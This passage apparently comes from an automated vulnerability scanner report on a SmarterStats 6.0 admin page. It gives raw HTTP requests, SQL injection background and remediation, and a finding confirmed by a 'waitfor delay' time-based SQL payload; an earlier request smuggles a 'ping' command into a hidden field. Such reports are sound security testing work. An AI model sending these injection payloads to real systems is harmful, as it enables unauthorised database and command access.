HJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAAdWZXJzaW9uCENvbXBhcmVyCEhhc2hTaXplDUtleVZhbHVlUGFpcnMAAwADCJIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuR2VuZXJpY0VxdWFsaXR5Q29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0I5gFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV1bXQUAAAAJAgAAAAcAAAAJAwAAAAQCAAAAkgFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5HZW5lcmljRXF1YWxpdHlDb21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQAAAAAHAwAAAAABAAAABQAAAAPkAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQT8%2F%2F%2F%2F5AFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0CAAAAA2tleQV2YWx1ZQECBgUAAAAHRW5hYmxlZAgBAQH6%2F%2F%2F%2F%2FP%2F%2F%2FwYHAAAABFRleHQKAfj%2F%2F%2F%2F8%2F%2F%2F%2FBgkAAAAKUmVzb3VyY2VJRAYKAAAACEBPcHRpb25zAfX%2F%2F%2F%2F8%2F%2F%2F%2FBgwAAAAIU2VsZWN0ZWQIAQAB8%2F%2F%2F%2F%2Fz%2F%2F%2F8GDgAAAApQYWdlVmlld0lEBg8AAAAKT3B0aW9uc1RhYgtkBRZjdGwwMCRNUEgkZ3JkU2VvU3RhdHVzDwU6VHJ1ZXxUcnVlfHxUcnVlfFRydWV8bGFzdFByb2Nlc3NpbmdEYXRlIGRlc2N8RmFsc2V8RmFsc2V8MGQFJmN0bDAwJFRQSCRIeXBlclRhYlN0cmlwMSRIeXBlclRhYkl0ZW04DzLaCwABAAAA%2F%2F%2F%2F%2FwEAAAAAAAAABAEAAADiAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkRpY3Rpb25hcnlgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0EAAAAB1ZlcnNpb24IQ29tcGFyZXIISGFzaFNpemUNS2V5VmFsdWVQYWlycwADAAMIkgFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5HZW5lcmljRXF1YWxpdHlDb21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQjmAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXVtdBQAAAAkCAAAABwAAAAkDAAAABAIAAACSAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkdlbmVyaWNFcXVhbGl0eUNvbXBhcmVyYDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAAAAAAcDAAAAAAEAAAAFAAAAA%2BQBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBPz%2F%2F%2F%2FkAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQIAAAADa2V5BXZhbHVlAQIGBQAAAAdFbmFibGVkCAEBAfr%2F%2F%2F%2F8%2F%2F%2F%2FBgcAAAAEVGV4dAoB%2BP%2F%2F%2F%2Fz%2F%2F%2F8GCQAAAApSZXNvdXJjZUlEBgoAAAAKQFNFT1N0YXR1cwH1%2F%2F%2F%2F%2FP%2F%2F%2FwYMAAAACFNlbGVjdGVkCAEAAfP%2F%2F%2F%2F8%2F%2F%2F%2FBg4AAAAKUGFnZVZpZXdJRAYPAAAADFNFT1N0YXR1c1RhYgtkOM5P3EdqRgSfYoIjJCDTiv3sZp5ktoudiy8rNReMpN8%3D&ctl00%24TPH%24HyperTabStrip1%24SelectedTab=ctl00_TPH_HyperTabStrip1_HyperTabItem1&ctl00%24MPH%24VisiblePage=ctl00_MPH_OptionsTab&ctl00%24MPH%24txtDomainName_SettingText=hoyt.net&ctl00%24MPH%24txtDomainUrl_SettingText=&ctl00%24MPH%24lstServer_SettingDropDown=1&ctl00%24MPH%24lstStatus_SettingDropDown=start&ctl00%24MPH%24txtSmarterLogDirectory=C%3A%5CSmarterLogs&ctl00%24MPH%24ddlChangeSiteAdmin_SettingDropDown=&ctl00%24MPH%24chkSeoEnabled_SettingCheck=on&ctl00%24MPH%24lstLogLocation_SettingDropDown=Local&ctl00%24MPH%24lstLogFormat_SettingDropDown=W3Cex&ctl00%24MPH%24lstMonthsToKeepSmStats_SettingDropDown=0&ctl00%24MPH%24txtExportLogDirectory=&ctl00%24MPH%24txtLogFileExportLocURL_SettingText=&ctl00%24MPH%24txtDefaultDocuments_SettingText=index.htm%0Aindex.html%0Adefault.asp%0Adefault.aspx&ctl00_MPH_grdLogLocations_HiddenInput=ctl00_MPH_grdLogLocations_CB64_OTg3ZTY2NDQzZTUxNDk5MGE4YWZjZmI0NTZhMjMyYzA-&ctl00_MPH_grdLogLocations_HiddenLSR=0|ping%20-n%2020%20127.0.0.1||x&ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxKeywords_SettingText=5&ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxCompetitors_SettingText=5&ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxRanking_SettingText=100&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%240=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%248=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2415=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%241=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%249=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2416=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%242=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2410=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2417=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%243=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2411=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2418=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%244=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2412=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2419=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%245=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2413=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2420=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%246=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2414=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2421=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%247=on&ctl00_MPH_grdLogStatus_HiddenInput=&ctl00_MPH_grdLogStatus_HiddenLSR=&ctl00_MPH_grdSeoStatus_HiddenInput=&ctl00_MPH_grdSeoStatus_HiddenLSR=&__ASYNCPOST=true&

Response

HTTP/2.0 100 Continue
Server: SmarterTools/2.0.3932.23369
Date: Mon, 11 Oct 2010 23:53:39 GMT
Content-Length: 0


2. SQL injection  previous  next
There are 23 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



2.1. http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSite.aspx [ctl00%24MPH%24txtSmarterLogDirectory parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Admin/frmSite.aspx

Issue detail

The ctl00%24MPH%24txtSmarterLogDirectory parameter appears to be vulnerable to SQL injection attacks. The payload 'waitfor%20delay'0%3a0%3a20'-- was submitted in the ctl00%24MPH%24txtSmarterLogDirectory parameter. The application took 25540 milliseconds to respond to the request, compared with 134 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

POST /Admin/frmSite.aspx?SiteId=1&popup=true HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSite.aspx?SiteId=1&popup=true
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;
Content-Type: application/x-www-form-urlencoded
Content-Length: 30128

ctl00%24MPH%24txtDefaultDocuments_SettingText=%0d%0aindex.htm%0d%0aindex.html%0d%0adefault.asp%0d%0adefault.aspx&__LASTFOCUS=&ctl00%24MPH%24lstServer_SettingDropDown=1&__EVENTTARGET=&__EVENTARGUMENT=&ctl00%24MPH%24txtSmarterLogDirectory=C%3a%5cSmarterLogs'waitfor%20delay'0%3a0%3a20'--&ctl00%24MPH%24lstLogFormat_SettingDropDown=IIS&ctl00%24MPH%24VisiblePage=ctl00_MPH_OptionsTab&ctl00%24MPH%24grdLogLocationsCheckAll=on&ctl00%24MPH%24lstMonthsToKeepSmStats_SettingDropDown=1&ctl00%24MPH%24txtLogFileExportLocURL_SettingText=555-555-0199@example.com&ctl00_MPH_grdSeoStatus_HiddenLSR=&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%243=on&ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxRanking_SettingText=100&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%242=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%241=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%240=on&ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxCompetitors_SettingText=5&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%249=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%248=on&ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxKeywords_SettingText=5&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%247=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%246=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%245=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2421=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%244=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2420=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2417=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2418=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2415=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2416=on&ctl00%24MPH%24txtDomainUrl_SettingText=555-555-0199@example.com&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2419=on&ctl00_MPH_grdLogStatus_HiddenInput=&ctl00_MPH_grdLogStatus_HiddenLSR=&ctl00%24MPH%24chkStripAfterSemi_SettingCheck=on&ctl00_MPH_grdLogLocations_HiddenInput=&ctl00%24MPH%24txtDomainName_SettingText=hoyt.net&ctl00%24MPH%24chkSeoEnabled_SettingCheck=on&ctl00_MPH_grdSeoStatus_HiddenInput=&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2410=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2414=on&ctl00%24TPH%24HyperTabStrip1%24SelectedTab=ctl00_TPH_HyperTabStrip1_HyperTabItem1&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2413=on&ctl00%24MPH%24txtExportLogDirectory=555-555-0199@example.com&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2412=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2411=on&ctl00%24MPH%24lstStatus_SettingDropDown=paused&ctl00%24MPH%24ddlChangeSiteAdmin_SettingDropDown=hoytnet&ctl00_MPH_grdLogLocations_CB64_OTg3ZTY2NDQzZTUxNDk5MGE4YWZjZmI0NTZhMjMyYzA-=on&__VIEWSTATE=%2fwEPDwUKLTYwMDgwNjA1Nw8WBB4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlFgJmD2QWAgIBD2QWDAICD2QWAgIBDxYCHgdWaXNpYmxlaGQCBA8WBB4Fc3R5bGUFDWRpc3BsYXk6bm9uZTsfAmhkAgYPFgIfAmhkAgcPZBYCZg9kFgICAQ8WAh8CaBYCAgEPFgIeBFRleHRlZAIID2QWAgIBD2QWAgIBD2QWAmYPZBYCAgEPZBYCAgQPFgIfAmhkAgkPZBYEAgEPZBYCAgMPFgIfBAUHTWVzc2FnZWQCAw9kFgJmD2QWAgIHD2QWCAICD2QWBgIBD2QWDmYPZBYCAgEPZBYCAgIPDxYCHwQFCGhveXQubmV0ZGQCAg8PFgIeCl9fcmVhZE9ubHlnZBYCAgEPZBYCAgIPDxYCHwQFATFkZAIDD2QWAgIBD2QWBGYPEGQPFgFmFgEQBQlsb2NhbGhvc3QFATFnZGQCAg8PFgIfBAUJbG9jYWxob3N0ZGQCBA9kFgICAQ9kFgJmDxBkEBUDB1N0YXJ0ZWQGUGF1c2VkCERpc2FibGVkFQMFc3RhcnQGcGF1c2VkCGRpc2FibGVkFCsDA2dnZ2RkAgUPZBYEZg8PFgYeCENzc0NsYXNzBQxJbmRlbnQgRml4ZWQfBAUPU21hcnRlckxvZyBQYXRoHgRfIVNCAgJkZAIBDw8WBB8GBQggU2V0dGluZx8HAgJkZAIGDw8WAh8FZ2QWAgIBD2QWBGYPEGQQFVcoKEdNVC0xMjowMCkgSW50ZXJuYXRpb25hbCBEYXRlIExpbmUgV2VzdCAoR01ULTExOjAwKSBNaWR3YXkgSXNsYW5kLCBTYW1vYRIoR01ULTEwOjAwKSBIYXdhaWkSKEdNVC0wOTowMCkgQWxhc2thJChHTVQtMDg6MDApIFRpanVhbmEsIEJhamEgQ2FsaWZvcm5pYSYoR01ULTA4OjAwKSBQYWNpZmljIFRpbWUgKFVTICYgQ2FuYWRhKS0oR01ULTA3OjAwKSBDaGlodWFodWEsIExhIFBheiwgTWF6YXRsYW4gLSBOZXcnKEdNVC0wNzowMCkgTW91bnRhaW4gVGltZSAoVVMgJiBDYW5hZGEpEyhHTVQtMDc6MDApIEFyaXpvbmEtKEdNVC0wNzowMCkgQ2hpaHVhaHVhLCBMYSBQYXosIE1hemF0bGFuIC0gT2xkGChHTVQtMDY6MDApIFNhc2thdGNoZXdhbjUoR01ULTA2OjAwKSBHdWFkYWxhamFyYSwgTWV4aWNvIENpdHksIE1vbnRlcnJleSAtIE9sZCYoR01ULTA2OjAwKSBDZW50cmFsIFRpbWUgKFVTICYgQ2FuYWRhKTUoR01ULTA2OjAwKSBHdWFkYWxhamFyYSwgTWV4aWNvIENpdHksIE1vbnRlcnJleSAtIE5ldxsoR01ULTA2OjAwKSBDZW50cmFsIEFtZXJpY2EmKEdNVC0wNTowMCkgRWFzdGVybiBUaW1lIChVUyAmIENhbmFkYSkaKEdNVC0wNTowMCkgSW5kaWFuYSAoRWFzdCkrKEdNVC0wNTowMCkgQm9nb3RhLCBMaW1hLCBRdWl0bywgUmlvIEJyYW5jbxMoR01ULTA0OjMwKSBDYXJhY2FzEihHTVQtMDQ6MDApIE1hbmF1cyIoR01ULTA0OjAwKSBBdGxhbnRpYyBUaW1lIChDYW5hZGEpEihHTVQtMDQ6MDApIExhIFBhehQoR01ULTA0OjAwKSBTYW50aWFnbxgoR01ULTAzOjMwKSBOZXdmb3VuZGxhbmQkKEdNVC0wMzowMCkgQnVlbm9zIEFpcmVzLCBHZW9yZ2V0b3duFShHTVQtMDM6MDApIEdyZWVubGFuZBQoR01ULTAzOjAwKSBCcmFzaWxpYRYoR01ULTAzOjAwKSBNb250ZXZpZGVvGChHTVQtMDI6MDApIE1pZC1BdGxhbnRpYxIoR01ULTAxOjAwKSBBem9yZXMaKEdNVC0wMTowMCkgQ2FwZSBWZXJkZSBJcy4lKEdNVCkgQ2FzYWJsYW5jYSwgTW9ucm92aWEsIFJleWtqYXZpaz0oR01UKSBHcmVlbndpY2ggTWVhbiBUaW1lIDogRHVibGluLCBFZGluYnVyZ2gsIExpc2JvbiwgTG9uZG9uPShHTVQrMDE6MDApIEJlbGdyYWRlLCBCcmF0aXNsYXZhLCBCdWRhcGVzdCwgTGp1YmxqYW5hLCBQcmFndWUsKEdNVCswMTowMCkgU2FyYWpldm8sIFNrb3BqZSwgV2Fyc2F3LCBaYWdyZWIvKEdNVCswMTowMCkgQnJ1c3NlbHMsIENvcGVuaGFnZW4sIE1hZHJpZCwgUGF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